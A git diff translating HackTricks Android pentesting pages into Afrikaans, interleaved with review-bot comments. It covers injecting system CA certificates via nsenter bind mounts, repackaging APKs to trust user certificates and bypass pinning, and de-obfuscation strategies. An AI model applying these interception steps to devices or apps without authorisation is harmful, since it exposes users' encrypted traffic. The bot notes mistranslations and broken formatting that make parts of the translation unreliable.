@@ -122,60 +114,53 @@ done # Get the PID of every process whose parent is one of the Zygotes: APP_PIDS=$( - echo "$ZYGOTE_PID $ZYGOTE64_PID" | \ - xargs -n1 ps -o 'PID' -P | \ - grep -v PID +echo "$ZYGOTE_PID $ZYGOTE64_PID" | \ +xargs -n1 ps -o 'PID' -P | \ +grep -v PID ) # Inject into the mount namespace of each of those apps: for PID in $APP_PIDS; do - nsenter --mount=/proc/$PID/ns/mnt -- \ - /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts & +nsenter --mount=/proc/$PID/ns/mnt -- \ +/bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts & done wait # Launched in parallel - wait for completion here echo "System certificate injected" ``` +### Bind-montasie deur NSEnter -### Bind-mounting through NSEnter - -1. **Setting Up a Writable Directory**: Initially, a writable directory is established by mounting a `tmpfs` over the existing non-APEX system certificate directory. This is achieved with the following command: - +1. **Opstel van 'n Skryfbare Gids**: Aanvanklik word 'n skryfbare gids opgestel deur 'n `tmpfs` oor die bestaande nie-APEX-stelselertifikaatgids te monteer. Dit word bereik met die volgende bevel: ```bash - mount -t tmpfs tmpfs /system/etc/security/cacerts +mount -t tmpfs tmpfs /system/etc/security/cacerts ``` +2. **Voorbereiding van CA-sertifikate**: Na die opstel van die skryfbare gids moet die CA-sertifikate wat jy wil gebruik, gekopieer word na hierdie gids. Dit mag die kopie van die verstek sertifikate vanaf `/apex/com.android.conscrypt/cacerts/` behels. Dit is noodsaaklik om die toestemmings en SELinux-etikette van hierdie sertifikate dienooreenkomstig aan te pas. -2. **Preparing CA Certificates**: Following the setup of the writable directory, the CA certificates that one intends to use should be copied into this directory. This might involve copying the default certificates from `/apex/com.android.conscrypt/cacerts/`. 
It's essential to adjust the permissions and SELinux labels of these certificates accordingly. - -3. **Bind Mounting for Zygote**: Utilizing `nsenter`, one enters the Zygote's mount namespace. Zygote, being the process responsible for launching Android applications, requires this step to ensure that all applications initiated henceforth utilize the newly configured CA certificates. The command used is: - +3. **Bind Montering vir Zygote**: Deur gebruik te maak van `nsenter`, betree jy die monteer-namespace van Zygote. Zygote, as die proses wat verantwoordelik is vir die begin van Android-toepassings, vereis hierdie stap om te verseker dat alle toepassings wat hierna geïnisieer word, die nuut gekonfigureerde CA-sertifikate gebruik. Die gebruikte bevel is: ```bash nsenter --mount=/proc/$ZYGOTE_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts ``` +Dit verseker dat elke nuwe app wat begin, sal voldoen aan die opgedateerde CA-sertifikate-instelling. -This ensures that every new app started will adhere to the updated CA certificates setup. - -4. **Applying Changes to Running Apps**: To apply the changes to already running applications, `nsenter` is again used to enter each app's namespace individually and perform a similar bind mount. The necessary command is: - +4. **Veranderinge toepas op lopende apps**: Om die veranderinge op reeds lopende programme toe te pas, word `nsenter` weer gebruik om individueel in elke app se namespace in te gaan en 'n soortgelyke bind mount uit te voer. Die nodige bevel is: ```bash nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/cacerts /apex/com.android.conscrypt/cacerts ``` +5. **Alternatiewe Benadering - Sagte Herlaai**: 'n Alternatiewe metode behels die uitvoer van die bind mount op die `init` proses (PID 1), gevolg deur 'n sagte herlaai van die bedryfstelsel met die `stop && start` opdragte. 
Hierdie benadering sal die veranderinge oor alle namespaces versprei, wat die noodsaaklikheid om elke lopende app individueel te adresseer, vermy. Hierdie metode word egter oor die algemeen minder verkies as gevolg van die ongerief van herlaaiing. -5. **Alternative Approach - Soft Reboot**: An alternative method involves performing the bind mount on the `init` process (PID 1) followed by a soft reboot of the operating system with `stop && start` commands. This approach would propagate the changes across all namespaces, avoiding the need to individually address each running app. However, this method is generally less preferred due to the inconvenience of rebooting. - -## References +## Verwysings * [https://httptoolkit.com/blog/android-14-install-system-ca-certificate/](https://httptoolkit.com/blog/android-14-install-system-ca-certificate/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
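Review bot: the runaway repetition "sertifisering van sertifisering van …" that opens this file's hunk is a translation-model artifact, not content, and has to be cut before merge, with the original English sentence it replaced re-translated by hand. In the same hunk, the `+` lines inside the bash block (`+if [ -n "$Z_PID" ]; then`, `+nsenter --mount=/proc/$Z_PID/ns/mnt -- \`, `+grep -v PID`) and the `+mount -t tmpfs tmpfs /system/etc/security/cacerts` line under step 1 strip the script's leading indentation; a translation PR should leave code fences byte-identical to upstream. The shell still runs, but the indent under step 1 is what kept the fence inside the numbered list item, and the blank lines removed between each numbered step and its fence (`+1. **Opstel van 'n Skryfbare Gids**: … bevel: ```bash`) will likely break the list rendering. Minor: "nie-APEX-stelselertifikaatgids" in step 1 is missing an "s" ("stelselsertifikaatgids").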
diff --git a/mobile-pentesting/android-app-pentesting/intent-injection.md b/mobile-pentesting/android-app-pentesting/intent-injection.md index 84a296d7a..c4a65fa0f 100644 --- a/mobile-pentesting/android-app-pentesting/intent-injection.md +++ b/mobile-pentesting/android-app-pentesting/intent-injection.md @@ -1,35 +1,31 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Take a look to: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)** +**Neem 'n kykie na: [https://blog.oversecured.com/Android-Access-to-app-protected-components/](https://blog.oversecured.com/Android-Access-to-app-protected-components/)**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
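Review bot: the translated header and footer boilerplate drifts between files in this patch even though the English source is identical everywhere: this file uses "GitHub-opslagplekke" and "hacking-truuks", the certificate page "github-opslag" and "hacktruuks", make-apk-accept-ca-certificate.md both "github-opslag" and "github-repositoriums" plus "haktruuks" and "HackTricks-uitrusting" for "swag", and react-native-application.md "github-repos". Translate the block once and paste the same text into every page so the wording and the link labels stay consistent.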
- - diff --git a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index b27ef0b66..64997932f 100644 --- a/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md @@ -1,91 +1,85 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** -Some applications don't like user downloaded certificates, so in order to inspect web traffic for some apps we actually have to decompile the application & add a few things & recompile it. +Sommige toepassings hou nie van sertifikate wat deur gebruikers afgelaai is nie, so om webverkeer vir sommige toepassings te ondersoek, moet ons eintlik die toepassing dekompilieer en 'n paar dinge byvoeg en dit weer saamstel. -# Automatic +# Outomaties -The tool [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) will **automatically** make the necessary changes to the application to start capturing the requests and will also disable certificate pinning (if any). +Die instrument [**https://github.com/shroudedcode/apk-mitm**](https://github.com/shroudedcode/apk-mitm) sal die nodige veranderinge aan die toepassing **outomaties** maak om die versoek vas te vang en sal ook sertifikaatpennetrekking deaktiveer (indien van toepassing). 
-# Manual +# Handmatig -First we decompile the app: `apktool d *file-name*.apk` +Eerstens dekompilieer ons die toepassing: `apktool d *lêernaam*.apk` ![](../../.gitbook/assets/img9.png) -Then we go into the **Manifest.xml** file & scroll down to the `<\application android>` tag & we are going to add the following line if it isn't already there: +Dan gaan ons na die **Manifest.xml**-lêer en rol af na die `<\application android>`-etiket en ons gaan die volgende lyn byvoeg as dit nog nie daar is nie: `android:networkSecurityConfig="@xml/network_security_config` -Before adding: +Voordat ons byvoeg: ![](../../.gitbook/assets/img10.png) -After adding: +Nadat ons byvoeg: ![](../../.gitbook/assets/img11.png) -Now go into the **res/xml** folder & create/modify a file named network\_security\_config.xml with the following contents: - +Gaan nou na die **res/xml**-vouer en skep/wysig 'n lêer met die naam network\_security\_config.xml met die volgende inhoud: ```markup - - - - - - - - - - + + + + + + + + + + ``` - -Then save the file & back out of all the directories & rebuild the apk with the following command: `apktool b *folder-name/* -o *output-file.apk*` +Stoor dan die lêer en keer terug uit al die gide en bou die apk weer op met die volgende bevel: `apktool b *gids-naam/* -o *uitvoer-lêer.apk*` ![](../../.gitbook/assets/img12.png) -Finally, you need just to **sign the new application**. [Read this section of the page Smali - Decompiling/\[Modifying\]/Compiling to learn how to sign it](smali-changes.md#sing-the-new-apk). +Laastens moet jy net die nuwe aansoek **onderteken**. [Lees hierdie gedeelte van die bladsy Smali - Decompiling/\[Modifying\]/Compiling om te leer hoe om dit te onderteken](smali-changes.md#sing-the-new-apk).
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
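Review bot: the `markup` block for network_security_config.xml shows ten lines removed and ten re-added, although a translation should not touch code; as with the bash block in the certificate page, the only difference appears to be stripped leading whitespace, so the XML should be restored verbatim from upstream. The placeholders inside inline code were translated (`apktool d *lêernaam*.apk`, `apktool b *gids-naam/* -o *uitvoer-lêer.apk*`), which is defensible for placeholders, but "aansoek" in "die nuwe aansoek **onderteken**" means an application form, not an app, and should be "toepassing" as used earlier on the same page. The missing closing quote in `android:networkSecurityConfig="@xml/network_security_config` is pre-existing and carried over unchanged, which is correct for a translation PR but worth a separate fix.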
- - diff --git a/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md b/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md index 0736258a0..82d1d759b 100644 --- a/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md +++ b/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md @@ -1,68 +1,64 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Manual **De-obfuscation Techniques** +## Handleiding **De-obfuscation-tegnieke** -In the realm of **software security**, the process of making obscured code understandable, known as **de-obfuscation**, is crucial. This guide delves into various strategies for de-obfuscation, focusing on static analysis techniques and recognizing obfuscation patterns. Additionally, it introduces an exercise for practical application and suggests further resources for those interested in exploring more advanced topics. +In die domein van **sagteware-sekuriteit** is die proses om versluierde kode verstaanbaar te maak, bekend as **de-obfuscation**, van kritieke belang. Hierdie gids ondersoek verskeie strategieë vir de-obfuscation, met die klem op statiese analise-tegnieke en die herkenning van versluieringspatrone. Daarbenewens bied dit 'n oefening vir praktiese toepassing en stel dit verdere hulpbronne voor vir diegene wat belangstel om meer gevorderde onderwerpe te verken. -### **Strategies for Static De-obfuscation** +### **Strategieë vir Statische De-obfuscation** -When dealing with **obfuscated code**, several strategies can be employed depending on the nature of the obfuscation: +Wanneer dit kom by **versluierde kode**, kan verskeie strategieë gebruik word, afhangende van die aard van die versluiering: -- **DEX bytecode (Java)**: One effective approach involves identifying the application's de-obfuscation methods, then replicating these methods in a Java file. This file is executed to reverse the obfuscation on the targeted elements. -- **Java and Native Code**: Another method is to translate the de-obfuscation algorithm into a scripting language like Python. This strategy highlights that the primary goal is not to fully understand the algorithm but to execute it effectively. +- **DEX-bytekode (Java)**: Een effektiewe benadering behels die identifisering van die toepassing se de-obfuscation-metodes, gevolg deur die replicering van hierdie metodes in 'n Java-lêer. 
Hierdie lêer word uitgevoer om die versluiering op die geteikende elemente om te keer. +- **Java en Inheemse Kode**: 'n Ander metode is om die de-obfuscation-algoritme te vertaal na 'n skripsietaal soos Python. Hierdie strategie beklemtoon dat die primêre doel nie is om die algoritme ten volle te verstaan nie, maar om dit doeltreffend uit te voer. -### **Identifying Obfuscation** +### **Identifisering van Versluiering** -Recognizing obfuscated code is the first step in the de-obfuscation process. Key indicators include: +Die herkenning van versluierde kode is die eerste stap in die de-obfuscation-proses. Sleutelindikators sluit in: -- The **absence or scrambling of strings** in Java and Android, which may suggest string obfuscation. -- The **presence of binary files** in the assets directory or calls to `DexClassLoader`, hinting at code unpacking and dynamic loading. -- The use of **native libraries alongside unidentifiable JNI functions**, indicating potential obfuscation of native methods. +- Die **afwesigheid of vermenging van strings** in Java en Android, wat moontlik dui op string-versluiering. +- Die **teenwoordigheid van binêre lêers** in die bates-gids of oproepe na `DexClassLoader`, wat dui op kode-ontpakkings en dinamiese laai. +- Die gebruik van **inheemse biblioteke saam met onidentifiseerbare JNI-funksies**, wat moontlike versluiering van inheemse metodes aandui. -## **Dynamic Analysis in De-obfuscation** +## **Dinamiese Analise in De-obfuscation** -By executing the code in a controlled environment, dynamic analysis **allows for the observation of how the obfuscated code behaves in real time**. This method is particularly effective in uncovering the inner workings of complex obfuscation patterns that are designed to hide the true intent of the code. +Deur die kode in 'n beheerde omgewing uit te voer, maak dinamiese analise dit moontlik om die gedrag van die versluierde kode in werklike tyd waar te neem. 
Hierdie metode is veral doeltreffend om die innerlike werking van komplekse versluieringspatrone bloot te lê wat ontwerp is om die ware bedoeling van die kode te verberg. -### **Applications of Dynamic Analysis** +### **Toepassings van Dinamiese Analise** -- **Runtime Decryption**: Many obfuscation techniques involve encrypting strings or code segments that only get decrypted at runtime. Through dynamic analysis, these encrypted elements can be captured at the moment of decryption, revealing their true form. -- **Identifying Obfuscation Techniques**: By monitoring the application's behavior, dynamic analysis can help identify specific obfuscation techniques being used, such as code virtualization, packers, or dynamic code generation. -- **Uncovering Hidden Functionality**: Obfuscated code may contain hidden functionalities that are not apparent through static analysis alone. Dynamic analysis allows for the observation of all code paths, including those conditionally executed, to uncover such hidden functionalities. +- **Tydontsleuteling**: Baie versluieringstegnieke behels die versleuteling van strings of kode-segmente wat slegs tydens uitvoering ontsluit word. Deur dinamiese analise kan hierdie versleutelde elemente vasgevang word op die oomblik van ontsluiting, wat hul ware vorm onthul. +- **Identifisering van Versluieringstegnieke**: Deur die gedrag van die toepassing te monitor, kan dinamiese analise help om spesifieke versluieringstegnieke te identifiseer wat gebruik word, soos kode-virtualisering, pakkers of dinamiese kode-generering. +- **Blootstelling van Versteekte Funksionaliteit**: Versluierde kode kan versteekte funksionaliteit bevat wat nie deur statiese analise alleen sigbaar is nie. Dinamiese analise maak dit moontlik om alle kodepaaie waar te neem, insluitend diegene wat kondisioneel uitgevoer word, om sulke versteekte funksionaliteit bloot te lê. 
-## References and Further Reading +## Verwysings en Verdere Leeswerk * [https://maddiestone.github.io/AndroidAppRE/obfuscation.html](https://maddiestone.github.io/AndroidAppRE/obfuscation.html) -* BlackHat USA 2018: “Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library” \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)] - * This talk goes over reverse engineering one of the most complex anti-analysis native libraries I’ve seen used by an Android application. It covers mostly obfuscation techniques in native code. -* REcon 2019: “The Path to the Payload: Android Edition” \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)] - * This talk discusses a series of obfuscation techniques, solely in Java code, that an Android botnet was using to hide its behavior. +* BlackHat USA 2018: "Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library" \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)] +* Hierdie praatjie gaan oor die omgekeerde ingenieurswese van een van die mees komplekse anti-analise inheemse biblioteke wat ek gesien het wat deur 'n Android-toepassing gebruik word. Dit dek hoofsaaklik versluieringstegnieke in inheemse kode. +* REcon 2019: "The Path to the Payload: Android Edition" \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)] +* Hierdie praatjie bespreek 'n reeks versluieringstegnieke, uitsluitlik in Java-kode, wat deur 'n Android-botnet gebruik is om sy gedrag te verberg.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
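Review bot: the heading `+## Handleiding **De-obfuscation-tegnieke**` picks the wrong sense of "Manual" (a handbook rather than "by hand"); it should read "Handmatige", matching the `# Handmatig` heading used in make-apk-accept-ca-certificate.md in this same patch. In the references at the end of the hunk, the indented sub-bullets describing each talk (`-     * This talk goes over…`, `-     * This talk discusses…`) are re-added at top level (`+* Hierdie praatjie gaan oor…`, `+* Hierdie praatjie bespreek…`), which flattens the nested list so the descriptions no longer attach to their talks; keep the leading indentation. Also, "Statische" in `+### **Strategieë vir Statische De-obfuscation**` is Dutch rather than Afrikaans ("Statiese").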
